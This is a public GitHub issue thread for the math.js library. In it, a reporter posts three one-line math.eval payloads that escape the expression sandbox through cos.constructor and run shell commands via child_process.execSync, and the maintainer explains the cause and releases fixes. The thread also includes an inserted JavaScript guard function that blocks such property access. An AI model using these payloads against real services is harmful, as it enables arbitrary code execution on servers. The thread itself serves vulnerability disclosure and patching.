
more eval exploits #821

Closed
comex opened this Issue Apr 2, 2017 · 5 comments

@comex

comex commented Apr 2, 2017

math.eval('["//","a/*\\nreturn process.mainModule.require"]._data.map(cos.constructor)[1]()("child_process").execSync("ps >&2")');
math.eval('import({matrix:cos.constructor},{override:1});x=["process.mainModule.require(\\"child_process\\").execSync(\\"ps >&2\\")"];x()');
math.eval('a=["process.mainModule.require(\\"child_process\\").execSync(\\"ps >&2\\")"]._data;a.isRange=true;x={subset:cos.constructor}[a];x()');

Unfortunately, this is pretty much a fundamentally insecure design.

@josdejong josdejong closed this in ebb3c9b Apr 2, 2017

@josdejong josdejong added the bug label Apr 2, 2017

@josdejong


Owner

josdejong commented Apr 2, 2017

Thanks a lot @comex 👍
I've just released v3.11.0 with another fix.

Unfortunately, this is pretty much a fundamentally insecure design.

Can you elaborate why you think this is the case?

Here is my view on it: any evaluation of arbitrary code is a risk in general, so offering an evaluation parser immediately involves a risk. math.js has its own expression parser though, it does not use JavaScript's dangerous eval function (except for internal optimization). It has its own operators, functions, and variables, isolated from JavaScript. So this is basically a secure sandbox, and a secure design. In JavaScript there are four ways to evaluate code: eval, new Function, setTimeout, setInterval. These are not accessible from within the expression parser. Well... should not be accessible, since a security issue popped up in that regard. The security vulnerability that @CapacitorSet and @denvit found is that you can access Function via the .constructor property of any function, like math.eval('cos.constructor("evil js code")()'). I'm very grateful that these guys found and reported this vulnerability, and also that you and others help us find related security issues. I'm no hacker nor security expert so I really need your help!

So far the security issues that I've seen all boil down to accessing Function via the .constructor property of a function. This sounds like a very clear and manageable issue, and is solved in the latest version. We need to be careful and try to find other security vulnerabilities but I don't see a reason to panic. I hope we can work together to find different security issues in case there are more.

As a side note: @comex I would prefer reporting new security issues in private rather than here in a public issue. We plug them asap but it may not always be possible to apply a fast fix for whatever reason.
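The root cause described above is that a property read on a function value can return the Function constructor. The following is an added illustration of the kind of property-access guard an expression evaluator needs; it is not math.js's own code, and the names `safeGetProperty`, `attemptRead` and `FORBIDDEN_PROPS` are assumptions made for this example.

```javascript
// Added example, not math.js's own implementation: a property-access guard
// that stops an evaluated expression from reaching the Function constructor
// through `fn.constructor` (or through prototype-chain properties in general).

// Property names that must never be reachable from an expression.
const FORBIDDEN_PROPS = new Set(['constructor', '__proto__', 'prototype']);

// Values an expression may read properties from: primitives, arrays and
// plain objects. Functions are excluded because every function exposes the
// Function constructor through its prototype chain.
function isReadableValue(v) {
  if (v === null || typeof v !== 'object') return typeof v !== 'function';
  if (Array.isArray(v)) return true;
  const proto = Object.getPrototypeOf(v);
  return proto === Object.prototype || proto === null;
}

// Read property `name` from `obj` on behalf of an evaluated expression.
function safeGetProperty(obj, name) {
  if (FORBIDDEN_PROPS.has(name)) {
    throw new Error(`Access to property "${name}" is not allowed`);
  }
  if (!isReadableValue(obj)) {
    throw new Error('Cannot read properties of functions or host objects');
  }
  // Only own properties: inherited members (map, toString, ...) belong to
  // the JavaScript runtime, not to the expression's data.
  if (!Object.prototype.hasOwnProperty.call(obj, name)) {
    return undefined;
  }
  const value = obj[name];
  if (typeof value === 'function') {
    throw new Error(`Property "${name}" is a function and is not exposed`);
  }
  return value;
}

// Wrap a read and report whether the guard blocked it (constructed helper).
function attemptRead(obj, name) {
  try {
    return { ok: true, value: safeGetProperty(obj, name) };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}
```

For example, `attemptRead(Math.cos, 'constructor')` is blocked, while `attemptRead({ a: 1 }, 'a')` returns `1`.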

@CapacitorSet


CapacitorSet commented Apr 2, 2017

(As a sidenote, you're looking for @denysvitali, not @denvit.)

@josdejong


Owner

josdejong commented Apr 2, 2017

Ah thanks for the correction @CapacitorSet. Sorry for mixing up @denvit and @denysvitali :(

Looking at the reactions my previous comment is confusing to some, in that case please don't hesitate to comment. I can definitely be overlooking something or maybe I'm not good at explaining this stuff.

@denysvitali


denysvitali commented Apr 2, 2017

@josdejong No problem, unfortunately someone already took my handle on Twitter and GitHub :/

@josdejong


Owner

josdejong commented Apr 2, 2017

Just released v3.11.1 which better pinpoints all these related vulnerabilities and catches two new variations.
